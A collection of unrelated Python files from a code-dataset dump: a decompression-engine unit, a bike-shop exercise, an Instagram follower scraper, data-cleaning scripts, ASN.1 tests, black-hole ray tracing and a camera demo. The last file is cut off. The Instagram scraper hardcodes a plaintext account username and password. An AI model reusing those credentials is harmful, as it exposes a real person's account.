arg.number('-t', help=(\n 'Maximum number of bytes to strip from the beginning of the data; '\n 'The default value is 12.')\n ) = 12,\n min_ratio: arg('-r', metavar='R', help=(\n 'To determine whether a decompression algorithm was successful, the '\n 'ratio of compressed size to decompressed size is required to be at '\n 'least this number, a floating point value R; default value is 1.')\n ) = 1,\n ):\n if min_ratio <= 0:\n raise ValueError('The compression factor must be nonnegative.')\n super().__init__(tolerance=tolerance, prepend=prepend, min_ratio=min_ratio)\n self.engines = [\n engine() for engine in [zl, lzma, aplib, bz2, blz, lz4, lznt1]\n ]\n\n def process(self, data):\n best = None\n current_ratio = 1\n\n class result:\n unit = self\n\n def __init__(self, engine, cutoff=0, prefix=None):\n feed = data\n\n self.engine = engine\n self.prefix = prefix\n self.cutoff = cutoff\n\n if cutoff:\n feed = data[cutoff:]\n if prefix is not None:\n feed = prefix + data\n\n try:\n self.result = engine.process(feed)\n except RefineryPartialResult as pr:\n self.result = pr.partial\n except Exception:\n self.result = B''\n\n if not self.result:\n self.ratio = INF\n else:\n self.ratio = len(data) / len(self.result)\n\n @property\n def unmodified(self):\n return not self.prefix and not self.cutoff\n\n def schedule(self):\n nonlocal best, current_ratio\n if self.ratio >= self.unit.args.min_ratio:\n return\n prefix = hex(self.prefix[0]) if self.prefix else None\n r = 1 if self.unmodified and best and not best.unmodified else 0.9\n if self.engine.__class__ is lznt1:\n r /= 2\n if not best or self.ratio / current_ratio < r:\n self.unit.log_info(lambda: (\n F'obtained {self.ratio:.2f} compression ratio with: prefix={prefix}, '\n F'cutoff={self.cutoff}, engine={self.engine.name}'))\n best = self\n current_ratio = self.ratio\n\n for engine in self.engines:\n for t in range(self.args.tolerance):\n result(engine, t).schedule()\n if self.args.prepend:\n for p in range(0x100):\n result(engine, 0, bytes((p,))).schedule()\n\n if best is None:\n self.log_info('nothing worked, returning original data.')\n return data\n\n return best.result\n","sub_path":"refinery/units/compression/decompress.py","file_name":"decompress.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"453885832","text":"'''Bike'''\nclass Bike(object): #This section contains the Bike models with corresponding attributes\n def __init__(self, name, weight, unitcost):\n self.name = name\n self.weight = weight\n self.unitcost = unitcost\n \n def __repr__(self):\n return \"{} Bike\".format(self.name)\n\nBMX = Bike(\"BMX\", 40, 150)\nMountain = Bike(\"Mountain\", 40, 175)\nCruiser = Bike(\"Cruiser\", 35, 225)\nRoad = Bike(\"Road\", 25, 300)\nHybrid = Bike(\"Hybrid\", 25, 550)\nCity = Bike(\"City\", 30, 600)\n\n'''Shop'''\nclass Shop(object): #Shops, they take inventory and money from Customers\n def __init__(self, name, inventory=None, salemargin=1.20): #The sequence here must correspond in each subsequent line\n self.name = name\n self.salemargin = 1.20\n self.profit = 0\n if inventory != None:\n self.inventory = inventory\n else:\n self.inventory = {}\n\n def store_inventory(self):\n print(self.inventory)\n \n def bike_filter(self, budget):\n afford_list = []\n for bike in self.inventory: \n if bike.unitcost*self.salemargin <= budget: #Remember, self takes on the properties of the object, needs to be definite to attribute the properties\n afford_list.append(bike)\n return afford_list\n \n def sell_bike(self, name, customer): \n for bike in self.inventory:\n if bike.name == name:\n if self.inventory[bike] > 0:\n sale_price = bike.unitcost*self.salemargin \n if sale_price <= customer.budget:\n customer.budget -= sale_price\n customer.inventory.append(bike)\n self.inventory[bike] -= 1\n return\n else:\n print(\"Our apologies, you cannot afford this product.\")\n return\n else: \n print(\"Sorry, we're out...\")\n return\n \nprint(\"Here's what the Big Bike Store has to offer!\")\nBigBikeStore = Shop(\"Big Bike Store\", {BMX : 10, Mountain : 15, Cruiser : 15, Road : 20, Hybrid : 15, City : 10})\n\n\n'''Customer''' \nclass Customer(object): #Customers, Shops take money from them\n def __init__(self, name, budget, inventory=None):\n self.name = name\n self.budget = budget\n if inventory != None: #Inventory exists outside of the object/instance starting out, to be established, it has to be created independent of the instance...\n self.inventory = inventory\n else:\n self.inventory = []\n\nRonald = Customer(\"Ronald\", 200)\nFrancis = Customer(\"Francis\", 500)\nLois = Customer(\"Lois\", 1000)\n\n#Shows Big Bike Store inventory of bike types and number available\nBigBikeStore.store_inventory()\n\n#Filters affordable bikes based on the unit cost times the 20% sales margin increase for each customer's budget \nprint(\"What can each customer afford?\")\nBudgetedBikes = BigBikeStore.bike_filter(Ronald.budget)\nprint(Ronald.name, BudgetedBikes)\nBudgetedBikes = BigBikeStore.bike_filter(Francis.budget)\nprint(Francis.name, BudgetedBikes)\nBudgetedBikes = BigBikeStore.bike_filter(Lois.budget)\nprint(Lois.name, BudgetedBikes)\n\n#Sells the bike to each customer\nBigBikeStore.sell_bike(BMX.name, Ronald)\nBigBikeStore.sell_bike(Road.name, Francis)\nBigBikeStore.sell_bike(Hybrid.name, Lois)\n\n#Shows the bike in the customer's inventory\nprint(\"What's the choice for each customer?\")\nprint(Ronald.name, Ronald.inventory)\nprint(Francis.name, Francis.inventory)\nprint(Lois.name, Lois.inventory)\n\n#Shows customer's budget after sale\nprint(\"Show the customer and their leftover budget:\")\nprint(Ronald.name, Ronald.budget)\nprint(Francis.name, Francis.budget)\nprint(Lois.name, Lois.budget)\n\n#Shows store inventory after sale\nBigBikeStore.store_inventory()","sub_path":"thinkful/projects/bikeindustry/bikeindustry.py","file_name":"bikeindustry.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592719706","text":"from selenium import webdriver # selenium\nfrom selenium.webdriver.common.keys import Keys # selenium\nimport time # delay\nimport sys # loading bar\nimport threading # optimization\nfrom threading import Thread # optimization\n\ndef extract_driver(extract_type):\n driver = webdriver.Chrome(\"/Users/alazsengul/Desktop/chromedriver\")\n driver.get(\"https://www.instagram.com/\")\n\n time.sleep(2)\n\n # STEP 1 - - - Navigate to login page.\n driver.find_element_by_class_name('izU2O').find_element_by_tag_name('a').click()\n\n time.sleep(2)\n\n # STEP 2 - - - Input account information.\n login_inputs = driver.find_element_by_class_name('EPjEi').find_elements_by_class_name('zyHYP')\n login_inputs[0].send_keys('alazsengul')\n login_inputs[1].send_keys('kanyewest')\n\n # STEP 3 - - - Login.\n driver.find_element_by_class_name('yZn4P').click()\n\n time.sleep(2)\n\n # STEP 4 - - - Navigate to profile page of account.\n driver.find_element_by_class_name('coreSpriteDesktopNavProfile').click()\n\n time.sleep(2)\n\n # STEP 5 - - - Store information about account.\n li_numbers = driver.find_elements_by_class_name('g47SY ')\n list_count = int(extract_number(li_numbers[extract_type].text))\n\n # STEP 6 - - - Scroll and store through either followers or following list.\n driver.find_element_by_class_name('k9GMp ').find_elements_by_class_name('Y8-fY ')[extract_type].click()\n\n time.sleep(2)\n\n action = webdriver.ActionChains(driver)\n action.send_keys(Keys.END)\n action.click()\n\n list_index = 0\n\n while (list_index < (list_count - 5)):\n action.perform()\n list_index = len(driver.find_elements_by_class_name('zsYNt'))\n\n list_spans = driver.find_elements_by_class_name('zsYNt')\n\n time.sleep(2)\n\n final_list = [span.text for span in list_spans]\n\n if (extract_type == 1):\n owers_list.append(final_list)\n elif (extract_type == 2):\n owing_list.append(final_list)\n\n driver.quit()\n\ndef extract_number(input_string):\n string_list = []\n for character in input_string:\n if character.isdigit():\n string_list.append(character)\n final_string = \"\".join(string_list)\n return(final_string)\n\ndef extract_haters(owers_list, owing_list):\n haters = []\n for following in owing_list:\n if following not in owers_list:\n haters.append(following)\n return(haters)\n\ndef owers():\n extract_driver(1)\n\ndef owing():\n extract_driver(2)\n\ndef main_thread():\n Thread(target = owers).start()\n Thread(target = owing).start()\n\nif __name__ == '__main__':\n\n owers_list = []\n owing_list = []\n\n main_thread()\n\n extract_haters(owers_list[0], owing_list[0])\n","sub_path":"insta.py","file_name":"insta.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"167535124","text":"########## IMPORT LIBRARIES ########## \n\n# sys is required to use the open function to write on file\nimport sys\n# pandas is needed to read the csv file and to perform some basic operations on dataframes\nimport pandas as pd\n# ST_AsGeoJSON returns a json object, so we can use json.load to parse it\nimport json\n# to read and write on csv\nimport csv\n# transform coordinates into scring codes \nimport sklearn.neighbors as neigh\n# compute the nearest neighbors of a set of points\nfrom sklearn.neighbors import NearestNeighbors\n# to perform normalization of the dataframe\nfrom sklearn import preprocessing\n# operations on arrays\nimport numpy as np\n# date format \nimport datetime\n# manipulation of time format\nimport time\n\n\n########## IMPORT MY SCRIPTS ########## \n\nfrom build_loc_feat import from_array_to_string\n\n\n########## MAIN FUNCTION ##########\n\ndef main():\n\n if len(sys.argv) <= 2:\n return -1\n\n stop = sys.argv[1]\n id_area = sys.argv[2]\n\n df_areas = pd.read_csv('../../datasets/in/Traj' + stop + 'min/vehicle_areas.csv')\n\n df_areas = df_areas[df_areas[\"area\"] == int(id_area)]\n bottom_left_y_min = df_areas[\"bottom_left_y\"].min()\n bottom_left_x_min = df_areas[\"bottom_left_x\"].min()\n top_right_y_min = df_areas[\"top_right_y\"].max()\n top_right_x_min = df_areas[\"top_right_x\"].max()\n\n with open('../../datasets/POIdict.json', 'r') as f:\n dict_poi = json.load(f)\n\n file_name_in = ['../../datasets/euro_pofw.csv', '../../datasets/euro_poi.csv', '../../datasets/euro_transport_traffic.csv']\n\n file_name_out = '../../datasets/athens_POI.csv'\n header = \"fclass,category,lon,lat,name\\n\"\n\n # write header\n with open(file_name_out, 'w', newline='\\n') as f:\n f.write(header)\n\n for f in file_name_in:\n df = pd.read_csv(f)\n\n for _, row in df.iterrows():\n lat = row[\"lat\"]\n lon = row[\"lon\"]\n\n # if the poi is in the area selected\n if bottom_left_y_min < lat < top_right_y_min and bottom_left_x_min < lon < top_right_x_min:\n fclass = row[\"fclass\"]\n # if it's of a category we're interested in\n if fclass in dict_poi.keys():\n category = dict_poi[fclass]\n\n # write the row in the dataset\n with open(file_name_out, 'a', newline='\\n') as f:\n line = [fclass, category, lon, lat]\n f.write(from_array_to_string(line)+\"\\n\")\n \n return 0\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"python/clean_POI.py","file_name":"clean_POI.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"648507553","text":"import data\nimport hq_trivia as h\n\nquestion_data = data.get_data()\n#---------\n#test ratio\n#----------\nratio_num_correct = 0\nratio_num_tested = 0\ndef test_ratio():\n global ratio_num_correct\n global ratio_num_tested\n for datum in question_data:\n q = datum[0]\n a = datum[1][0]\n b = datum[1][1]\n c = datum[1][2]\n answer = datum[2]\n if answer == h.get_best_ratio(q, a, b, c):\n ratio_num_correct += 1\n ratio_num_tested += 1\n \n#----------------\n#test most search\n#----------------\nmost_num_correct = 0\nmost_num_tested = 0\ndef test_most_search():\n global most_num_correct\n global most_num_tested\n for datum in question_data:\n q = datum[0]\n a = datum[1][0]\n b = datum[1][1]\n c = datum[1][2]\n answer = datum[2]\n if answer == h.get_most_search(q, a, b, c):\n most_num_correct += 1\n most_num_tested += 1\n","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"216522032","text":"#\n# This file is part of pyasn1-alt-modules software.\n#\n# Created by Russ Housley\n# Copyright (c) 2021, Vigil Security, LLC\n# License: http://vigilsec.com/pyasn1-alt-modules-license.txt\n#\nimport sys\nimport unittest\n\nfrom pyasn1.codec.der.decoder import decode as der_decoder\nfrom pyasn1.codec.der.encoder import encode as der_encoder\n\nfrom pyasn1.type import univ\n\nfrom pyasn1_alt_modules import pem\nfrom pyasn1_alt_modules import rfc5652\nfrom pyasn1_alt_modules import rfc9044\n\n\nclass AuthenticatedDataGMAC128TestCase(unittest.TestCase):\n pem_text = \"\"\"\\\nMIIBHQYLKoZIhvcNAQkQAQKgggEMMIIBCAIBADFRok8CAQQwIwQQ+28rOVL9dEnS\nmPaKpLzZTRgPMjAyMDExMTAxMjAwMDBaMAsGCWCGSAFlAwQBLQQYDMG1WyligADX\nAF3DS35MotxnNdU65N7xMBsGCWCGSAFlAwQBCTAOBAy9T+z9c30p5UGfMH6hCwYJ\nYIZIAWUDBAIBMCsGCSqGSIb3DQEHAaAeBBxUaGlzIGlzIHNvbWUgc2FtcGxlIGNv\nbnRlbnQuokswGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAvBgkqhkiG9w0BCQQx\nIgQgyHXfKkIQcEqe3du238yHBHEWj5BNGDMYu/GErAsEXlMEDIbpDtygvp/XTdWc\nNw==\n\"\"\"\n\n def setUp(self):\n self.asn1Spec = rfc5652.ContentInfo()\n\n def testDerCodec(self):\n substrate = pem.readBase64fromText(self.pem_text)\n asn1Object, rest = der_decoder(substrate, asn1Spec=self.asn1Spec)\n\n self.assertFalse(rest)\n self.assertTrue(asn1Object.prettyPrint())\n self.assertEqual(substrate, der_encoder(asn1Object))\n\n ad, rest = der_decoder(\n asn1Object['content'],\n asn1Spec=rfc5652.AuthenticatedData())\n\n self.assertFalse(rest)\n self.assertTrue(ad.prettyPrint())\n self.assertEqual(asn1Object['content'], der_encoder(ad))\n\n self.assertEqual(0, ad['version'])\n self.assertEqual(\n rfc9044.id_aes128_GMAC,\n ad['macAlgorithm']['algorithm'])\n\n param, rest = der_decoder(\n ad['macAlgorithm']['parameters'],\n asn1Spec=rfc9044.GCMParameters())\n\n self.assertFalse(rest)\n self.assertTrue(ad.prettyPrint())\n self.assertEqual(ad['macAlgorithm']['parameters'], der_encoder(param))\n\n iv = univ.OctetString(hexValue='bd4fecfd737d29e5419f307e')\n self.assertEqual(iv, param['nonce'])\n self.assertEqual(12, param['length'])\n\n def testOpenTypes(self):\n substrate = pem.readBase64fromText(self.pem_text)\n asn1Object, rest = der_decoder(substrate,\n asn1Spec=self.asn1Spec,\n decodeOpenTypes=True)\n\n self.assertFalse(rest)\n self.assertTrue(asn1Object.prettyPrint())\n self.assertEqual(substrate, der_encoder(asn1Object))\n\n ad = asn1Object['content']\n self.assertEqual(0, ad['version'])\n self.assertEqual(\n rfc9044.id_aes128_GMAC,\n ad['macAlgorithm']['algorithm'])\n\n param = ad['macAlgorithm']['parameters']\n iv = univ.OctetString(hexValue='bd4fecfd737d29e5419f307e')\n self.assertEqual(iv, param['nonce'])\n self.assertEqual(12, param['length'])\n\n\nsuite = unittest.TestLoader().loadTestsFromModule(sys.modules[__name__])\n\nif __name__ == '__main__':\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"tests/test_rfc9044.py","file_name":"test_rfc9044.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"507885064","text":"#!/usr/bin/python\n\nuser_id = '10045092'\n\nimport json\nwith open('/vagrant/data/osn-data/matrices/{}.json'.format(user_id), 'r') as file:\n matrix = json.load(file)\n\n# mean w variance w momentum w entropy\n\nimport numpy\nimport scipy.stats\n\nmean = numpy.mean(matrix, axis=0)\nvariance = numpy.var(matrix, axis=0)\n\nnp_matrix = numpy.array(matrix)\nentropy = []\nfor i in range(len(matrix[0])):\n occu = {}\n for e in np_matrix[:,i]:\n if str(e) in occu:\n occu[str(e)] = occu[str(e)] + 1\n else:\n occu[str(e)] = 1\n count = occu.values()\n prob = []\n for c in count:\n prob.append(c/sum(count))\n entropy.append(scipy.stats.entropy(prob))\n\n#import numpy.ndarray\n\nwith open('/vagrant/data/osn-data/matrices/mean_{}.json'.format(user_id), 'w') as file:\n json.dump(mean.tolist(), file)\n\nwith open('/vagrant/data/osn-data/matrices/variance_{}.json'.format(user_id), 'w') as file:\n json.dump(variance.tolist(), file)\n\nwith open('/vagrant/data/osn-data/matrices/entropy_{}.json'.format(user_id), 'w') as file:\n json.dump(entropy, file)\n\nprint(mean)\nprint(variance)\nprint(entropy)\n\n#np_mean = numpy.array(mean)\n#for i in range(len(mean)-1):\n# print(np_mean[:,i])\n# print(np_mean[:,(len(mean)-1)])\n# print(scipy.stats.ttest_ind(np_mean[:,i],np_mean[:,(len(mean)-1)]))\n #print(scipy.stats.ttest_ind([1,2],[3,4]))\n","sub_path":"src/osn-data/old2/6stats.py","file_name":"6stats.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"318619830","text":"import numpy as np\r\nimport math\r\nimport scipy.integrate as sci\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nImage.MAX_IMAGE_PIXELS = None\r\n\r\ndef Reis(t, v): #Reissner-Nordström equations of motion.\r\n return np.array([v[2], L/v[0]**2, -L**2 * (3*M*v[0]-v[0]**2-2*Q)/v[0]**5]) \r\n\r\ndef R(t, v): #The celestial sphere of the observer.\r\n return (v[0]*math.cos(v[1]) + r0)**2 + (v[0]*math.sin(v[1]))**2 - rlimit**2\r\n\r\nR.terminal = True #Finishes at the celestial sphere.\r\n\r\ndef horizon(t, v): #The event horizon of the black hole.\r\n return v[0]-(M+np.sqrt(M**2-Q)) \r\n\r\nhorizon.terminal = True #Finishes at event horizon.\r\n\r\ndef hole(radius, shift=[0,0]): #Plots the event horizon filled in black.\r\n C = [[shift[0]+radius*math.cos(x), shift[1]+radius*math.sin(x)] for x in np.linspace(0,2*math.pi,80)]\r\n X,Y = zip(*C)\r\n plt.plot(X,Y, 'black')\r\n plt.fill(X,Y, 'black')\r\n \r\ndef Celestial(radius, shift=[0,0]): #Plots the celestial sphere.\r\n C = [[shift[0]+radius*math.cos(x), shift[1]+radius*math.sin(x)] for x in np.linspace(0,2*math.pi,80)]\r\n X,Y = zip(*C)\r\n plt.plot(X,Y, 'black')\r\n \r\ndef orbitpath(r, phi): #Plots the solution of the equations of motion.\r\n polar = zip(r, phi)\r\n cart = map(lambda x: [x[0]*math.cos(x[1]), x[0]*math.sin(x[1])], polar)\r\n x,y = zip(*cart)\r\n p = plt.plot(x,y, 'r-')\r\n plt.axis([-3,3,-3,3])\r\n hole(M+np.sqrt(M**2-Q))\r\n plt.axes().set_aspect('equal')\r\n return p\r\n\r\ndef orbitpath2(r, phi): #Same as first but for different line colour/ types.\r\n polar = zip(r, phi)\r\n cart = map(lambda x: [x[0]*math.cos(x[1]), x[0]*math.sin(x[1])], polar)\r\n x,y = zip(*cart)\r\n p = plt.plot(x,y,'k--')\r\n plt.axis([-10,10,-10,10])\r\n hole(M+np.sqrt(M**2-Q))\r\n plt.axes().set_aspect('equal')\r\n return p\r\n\r\ndef f(x): #Used to interpolate apparent angle.\r\n return np.interp(x,alpha1,alpha1s)\r\n\r\ndef pixelmap(k,l): #Uses relationship to map pixels.\r\n i = k - blackhole[0]\r\n j = l - blackhole[1]\r\n r = np.sqrt((i)**2+(j)**2)\r\n theta = np.arctan2(j,i)\r\n phi = np.arctan2(r,fclength)\r\n x,y = (np.tan(f(phi))*np.cos(theta)*fclength, np.tan(f(phi))*np.sin(theta)*fclength)\r\n if -blackhole[0] <= x <= im.size[0]-blackhole[0] and -blackhole[1] <= y <= im.size[1]-blackhole[1]:\r\n return pixels[x+blackhole[0],y+blackhole[1]]\r\n else:\r\n return (0,0,0)\r\n\r\nim = Image.open(\"Nebula_3.png\")\r\nnew_im = Image.new('RGB', (im.size[0],im.size[1]), 'black')\r\n\r\ntrange = [0., 300.] #Time range.\r\nfclength = im.size[0]/3 #Sets focal length of the camera.\r\nblackhole = [im.size[0]/2,im.size[1]/2] #Sets location of black hole in the image.\r\nM = 1 #Mass of the black hole.\r\nQ = 9*M**2/8 #Charge of the black hole, using notation choice Q = {r_Q}^2.\r\nr0 = 30 #Radius of where rays originate from.\r\nrlimit = 200 #Distance we have set celestial sphere from oberser.\r\nphi0 = np.pi #Angle from which rays originate from.\r\nalpha1 = []\r\nalpha1s = []\r\nalpha2 = []\r\nalpha2s = []\r\n#Initial conditions.\r\nv0p1 = [[[r0,math.pi,-1], L] for L in np.linspace(10.1, 100.0, 35)]\r\nv0p2= [[[r0,math.pi,-1], L] for L in np.linspace(5.2,10, 20)]\r\nv0p = v0p2 + v0p1\r\n\r\n#v0s1 = [[[r0,0.45,-1], 14.6]]\r\n#v0s2 = [[[r0,0.35,-1], 10.8]]\r\n#v0s3 = [[[r0,0.25,-1], 7.6]]\r\n#v0s4 = [[[r0,0.55,-1], 18.5]]\r\n#v0p = v0s1 + v0s2 + v0s3 + v0s4\r\n\r\n#v0p = [[[r,0,0],6] for r in np.linspace(4,17,5)]\r\n#v0p = [[[10,np.pi,-1],5.8685]]\r\n#v0p = [[[r,0,0],1] for r in np.linspace((3*M + np.sqrt(9*M**2 - 8*Q))/2 - 0.1,(3*M + np.sqrt(9*M**2 - 8*Q))/2 + 0.1,2)]\r\n\r\nfor v0 in v0p: #Solves equations of motion in range of initial conditions.\r\n L = v0[1]\r\n sol = sci.solve_ivp(Reis, trange, np.array(v0[0]), events = [horizon, R], t_eval = np.linspace(trange[0], trange[1], 10000))\r\n p = orbitpath(sol.y[0], sol.y[1])\r\n rfinal = sol.y[0][-1]\r\n phifinal = sol.y[1][-1]\r\n xfinal = rfinal * math.cos(phifinal)\r\n yfinal = rfinal * math.sin(phifinal)\r\n alpha1.append(math.atan2(v0[1]/v0[0][0], -v0[0][2])) #Appends apparent angle.\r\n alpha1s.append(-math.atan2(yfinal, r0 + xfinal)) #Appends actual angle.\r\nCelestial(rlimit, shift = [-r0,0])\r\nplt.xlabel('x/M')\r\nplt.ylabel('y/M')\r\n#plt.savefig('slightE.png', dpi=300) #Used to save images.\r\n#plt.show()\r\n\r\n#For comparison to Schwarzschild case.\r\n\r\n#v0p1 = [[[r0,math.pi,-1], L] for L in np.linspace(10.1, 100.0, 35)]\r\n#v0p2= [[[r0,math.pi,-1], L] for L in np.linspace(5.8,10, 20)]\r\n#v0p = v0p2 + v0p1\r\n#\r\nfor v0 in v0p: #Solves equations of motion in range of initial conditions.\r\n Q=0\r\n L = v0[1]\r\n sol = sci.solve_ivp(Reis, trange, np.array(v0[0]), events = [horizon, R], t_eval = np.linspace(trange[0], trange[1], 10000))\r\n p = orbitpath2(sol.y[0], sol.y[1])\r\n rfinal = sol.y[0][-1]\r\n phifinal = sol.y[1][-1]\r\n xfinal = rfinal * math.cos(phifinal)\r\n yfinal = rfinal * math.sin(phifinal)\r\n alpha2.append(math.atan2(v0[1]/v0[0][0], -v0[0][2])) \r\n alpha2s.append(-math.atan2(yfinal, r0 + xfinal))\r\nCelestial(rlimit, shift = [-r0,0])\r\nplt.xlabel('x/M')\r\nplt.ylabel('y/M')\r\nplt.plot(0,0,'r-',label = 'Reissner-Nordström Black Hole')\r\nplt.plot(0,0,'k--', label = 'Schwarzschild Black Hole')\r\nplt.legend(loc = 'lower right')\r\nplt.savefig('LoopR.png', dpi=300) #Used to save images.\r\nplt.show()\r\n\r\n\r\n#Produces the angle map.\r\nn = np.linspace(0,1.4,100)\r\nplt.plot(alpha1,alpha1s, label ='Reissner-Nordström Black Hole')\r\n#plt.plot(alpha2,alpha2s, '--', label ='Schwarzschild Black Hole')\r\nplt.plot(n,n,'k--')\r\nplt.xlabel('Alpha Prime')\r\nplt.ylabel('Alpha')\r\nplt.axis([0,1.5,-1.5,1.5])\r\nplt.legend(loc = 'lower right')\r\n#plt.savefig('AngleMapR.png', dpi=300)\r\nplt.show()\r\n\r\n \r\n#pixels = im.load()\r\n#new_pixels = new_im.load()\r\n#\r\n#for i in range(im.size[0]):\r\n# for j in range(im.size[1]):\r\n# new_pixels[i,j] = pixelmap(i,j)\r\n#new_im.show()\r\n#im.show()\r\n#\r\n#new_im.save(\"NebulaBlackHoleR.png\", 'PNG') #Saves the produced image.","sub_path":"Reissner.py","file_name":"Reissner.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601630520","text":"\"\"\" appengine-dscache: A datastore-based implementation of memcache\n\nDocs and examples: http://code.google.com/p/appengine-dscache/\n\nCopyright 2010 VendAsta Technologies Inc.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\nSee http://code.google.com/p/appengine-dscache/wiki/GettingStarted for instructions.\n\"\"\"\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import util\nfrom vacuum import Vacuum\n\ndef createApplication():\n \"\"\"Create new WSGIApplication and register all handlers.\n\n Returns:\n an instance of webapp.WSGIApplication with all dscache handlers registered.\n \"\"\"\n return webapp.WSGIApplication([\n (r\"^/[^\\/]+/vacuum/\", Vacuum)\n ],\n debug=True)\n\nAPP = createApplication()\n\ndef main():\n \"\"\" Main entry point. \"\"\"\n util.run_wsgi_app(APP)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/dscache/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111077946","text":"# This program demonstrates the usage of the camera through the OpenCV library.\n# A simple camera feed is displayed on screen, with the current frames per second.\n# See https://www.learnopencv.com/read-write-and-display-a-video-using-opencv-cpp-python/ for more details.\n\nimport cv2\nimport time\n\nFPS_SMOOTHING = 0.9\n\n# Initialize camera with a specified resolution.\n# It may take some experimenting to find other valid resolutions,\n# as the camera may end up displaying an incorrect image.\n# Alternatively, frames can be resized afterwards using the resize() function.\ncapture = cv2.VideoCapture(0)\ncapture.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncapture.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\nif not capture.isOpened():\n print(\"Failed to open camera!\")\n exit()\n\nfps, prev = 0.0, 0.0\nwhile True:\n # Calculate FPS\n now = time.time()\n fps = (fps*FPS_SMOOTHING + (1/(now - prev))*(1.0 - FPS_SMOOTHING))\n prev = now\n\n # Get a frame\n ret, frame = capture.read()\n if not ret:\n break\n\n # Write text onto the frame\n cv2.putText(frame, \"FPS: {:.1f}\".format(fps), (5, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,0))\n \n # Display the frame\n cv2.imshow(\"Preview - Press Esc to exit\", frame)\n \n # Check for user input\n c = cv2.waitKey(1)\n if c == 27 or c == ord('q') or c == ord('Q'): # Esc or Q\n break\n","sub_path":"Sample Programs (NEW!!!)/python/6_CameraTest/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"403311396","text":"import unittest\nimport pandas as pd\nimport numpy as np\nimport GCToo\nimport logging\nimport setup_GCToo_logger\n\n\nlogger = logging.getLogger(setup_GCToo_logger.LOGGER_NAME)\n\nclass TestGCToo(unittest.TestCase):\n def test_assemble_multi_index_df(self):\n\n # TODO: Add test of only row ids present as metadata\n # TODO: Add test of only col ids present as metadata \n\n g = GCToo.GCToo()\n \n g.row_metadata_df = pd.DataFrame({\"a\":range(3)}, index=range(4,7))\n logger.debug(\"g.row_metadata_df: {}\".format(g.row_metadata_df))\n\n g.col_metadata_df = pd.DataFrame({\"b\":range(7,10)}, index=range(10,13))\n logger.debug(\"g.col_metadata_df: {}\".format(g.col_metadata_df))\n\n g.data_df = pd.DataFrame({10:range(13,16), 11:range(16,19), 12:range(19,22)}, index=range(4,7))\n logger.debug(\"g.data_df: {}\".format(g.data_df))\n\n g.assemble_multi_index_df()\n logger.debug(\"g.multi_index_df: {}\".format(g.multi_index_df))\n\n assert \"a\" in g.multi_index_df.index.names, g.multi_index_df.index.names\n assert \"rid\" in g.multi_index_df.index.names, g.multi_index_df.index.names\n\n assert \"b\" in g.multi_index_df.columns.names, g.multi_index_df.columns.names\n assert \"cid\" in g.multi_index_df.columns.names, g.multi_index_df.columns.names\n\n r = g.multi_index_df.xs(7, level=\"b\", axis=1)\n logger.debug(\"r: {}\".format(r))\n assert r.xs(4, level=\"rid\", axis=0).values[0][0] == 13, r.xs(4, level=\"rid\", axis=0).values[0][0]\n assert r.xs(5, level=\"rid\", axis=0).values[0][0] == 14, r.xs(5, level=\"rid\", axis=0).values[0][0]\n assert r.xs(6, level=\"rid\", axis=0).values[0][0] == 15, r.xs(6, level=\"rid\", axis=0).values[0][0]\n\n def test_init(self):\n # Create test data\n data_df = pd.DataFrame([[1, 2, 3], [4, 5, 6]],\n index=[\"A\", \"B\"], columns=[\"a\", \"b\", \"c\"])\n row_metadata_df = pd.DataFrame([[\"rhd_A\", \"rhd_B\"], [\"rhd_C\", \"rhd_D\"]],\n index=[\"A\", \"B\"], columns=[\"rhd1\", \"rhd2\"])\n col_metadata_df = pd.DataFrame([\"chd_a\", \"chd_b\", \"chd_c\"],\n index=[\"a\", \"b\", \"c\"], columns=[\"chd1\"])\n\n # happy path\n GCToo.GCToo(data_df=data_df, row_metadata_df=row_metadata_df,\n col_metadata_df=col_metadata_df)\n\n def test_check_uniqueness(self):\n not_unique_data_df = pd.DataFrame([[1, 2, 3], [4, 5, 6]],\n index=[\"A\", \"B\"], columns=[\"a\", \"b\", \"a\"])\n not_unique_rhd = pd.DataFrame([[\"rhd_A\", \"rhd_B\"], [\"rhd_C\", \"rhd_D\"]],\n index=[\"A\", \"B\"], columns=[\"rhd1\", \"rhd1\"])\n\n # cids in data_df are not unique\n with 